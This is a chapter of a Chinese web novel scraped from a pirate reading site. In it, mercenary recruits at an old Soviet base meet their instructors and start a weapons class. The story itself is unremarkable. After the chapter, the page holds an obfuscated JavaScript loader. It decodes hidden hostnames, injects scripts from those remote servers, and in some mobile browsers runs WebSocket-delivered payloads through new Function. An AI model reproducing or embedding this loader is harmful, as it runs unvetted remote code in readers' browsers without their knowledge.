笔趣阁

字:
关灯 护眼
笔趣阁 > 战场合同工 > 第六章 教官

第六章 教官

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    基地之中很安静,很多时候安静得如同坟墓。除了在某些时候,会有急促的警报声传来。这个时候,所有人员都必须整装集合。林锐原来以为这是和军队之中一样,随时随地的紧急集合,目的是为了养成随时警觉,而且随时可以投入到军事行动之中的习惯。但是几次之后,他就发现这其实是有规律的。

    每天在相同的一个时间,就会有这样的一次紧急集合。赵建飞的解释是,每天在这个时间段,都会有卫星经过上空。为了避免这个集训营被发现,最好的方式就是把所有人都集中在一起,避免暴露。

    林锐猜的没错,这是一个前苏军事基地,随着那个庞大国家的解体,这里早已被人忘却,成了佣兵的天堂。

    今天,和赵建飞一起出现的还有另外两个人。一个黑人,和一个亚洲人。这两人都穿着厚重的雪地迷彩,军靴上有些潮湿,似乎是刚刚来到基地没有多久。林锐心中微微一动:难道这就是训练营的另外两个教官?

    赵建飞做了个手势道,“都站好了,来见见你们的另外两位教官。这是昆汀,他负责教你们伪装侦察和隐蔽行动,同时还最好的爆破手。”赵建飞指着那个有些阴沉的黑人道,“他也会教你们在战场上如何生存。九四年卢旺达大屠杀,将近上百万人丧生。而他当年才十八岁,却独自一人却在那个人间地狱之中生存了整整两个多月。没有补给没有后援,甚至没有希望。”

    赵建飞身后的那个黑人神色平静,像是一块顽石一般的坚强。

    赵建飞又转向另一个亚洲人,对众人道,“这位是唐坤。职业军医,还是危险的远程狙击的专家,不过你要是想和他玩近战,那就更是找死了。因为他虽然是个可怕的狙击手,但真正让他出名的却是徒手格斗,他曾经在地下搏击场称王称霸,令最危险的暴徒都闻风丧胆。对于这种人,最聪明的办法,就是绝对不要惹他。”

    所有佣兵学员的脸色都有些不太自然。似乎都被这两人身上所散发出来的血腥暴戾给镇住了。昆汀和唐坤,这两个人即便是就这样随随便便站着,也令他们感到隐隐有种不安。

    赵建飞回头看了看他们,耸耸肩道,“拜托,别这样,你们会吓坏这些小伙子的。来吧,笑一笑,打个招呼。”

    黑人对着这些学员们沉默地点了一下头,算是打了招呼。而唐坤更是直接,他看着这些学员冷冷地道,“我这个人不太会说话,因为我一向喜欢更动手。我保证在这个训练营之中,你们一定会恨我。因为你们现在就像一群白痴,完全不能理解唯有艰苦卓绝的训练,才能让你有更大的生存机会。”

    赵建飞看着这些新来的佣兵缓缓地道,“好了,人已经全部到齐了。从今天开始,这个训练营的一切将走入正轨。我必须告诉你们,在这里没有人权,没有所谓的私人空间,甚至没有正常的作息时间。你们要经历疲惫、痛苦、饥饿、严寒,各种危险和苦难来完成这个为期一年半的训练。”

    这个经常面带着倦怠的笑容,似乎漠视一切的男人,在说这些话的时候,却似乎极为认真。

    赵建飞说得没错,这里没有固定的作息时间,除了训练还是训练,训练的间歇就是休息。一天十八个小时的训练课程,另外的六个小时包括了用餐,上厕所,以及短暂的睡眠。第一课就是由赵建飞开始的,军械培训课程。

    赵建飞把这三十多个新人带到了基地的一个房间,并且拿出了两支步枪放在桌上。他看着所有人道,“我知道你们几乎全部都有服役的经历,也都使用过武器。所以你们会觉得奇怪,为什么还要进行军械武器的培训?也许你们会觉得有些多余。但是我告诉你们,这是每一个佣兵都必须经历的课程。而这个课程的好坏,将会在战场上决定你们的生死。”

    赵建飞拿起那两支步枪道,“现在我手上拿的这两支枪,所代表是世界上两个军事集团。也就是冷战时期的华约和北约两大组织。这两个大型国际军事组织,代表了军用武器的两个分支。其中之一就是以ak系列为最有代表性的前苏武器,而另一个代表则是以m系列步枪为代表的美式装备。世界各国的武器很多,但其生产制造的源流都受到了,这两个军事集团的影响。”

    赵建飞快速地卸下了步枪的弹匣,淡淡地道,“武器不同,子弹也不是通用的。北约成员国所使用的大都是俗称北约弹的5。56口径子弹,只在通用机枪上使用7。62毫米的子弹。而苏式武器,大部分都是7。62毫米子弹。我要你们熟悉所有的这些枪械和子弹。你们有什么问题?”
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x57\x69\x77\x51\x4b\x69\x58\x4b\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNoZGtmamxhcy56aGl4aWFuZ2h1aWJhbby5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《战场合同工》
打开
浏览器
继续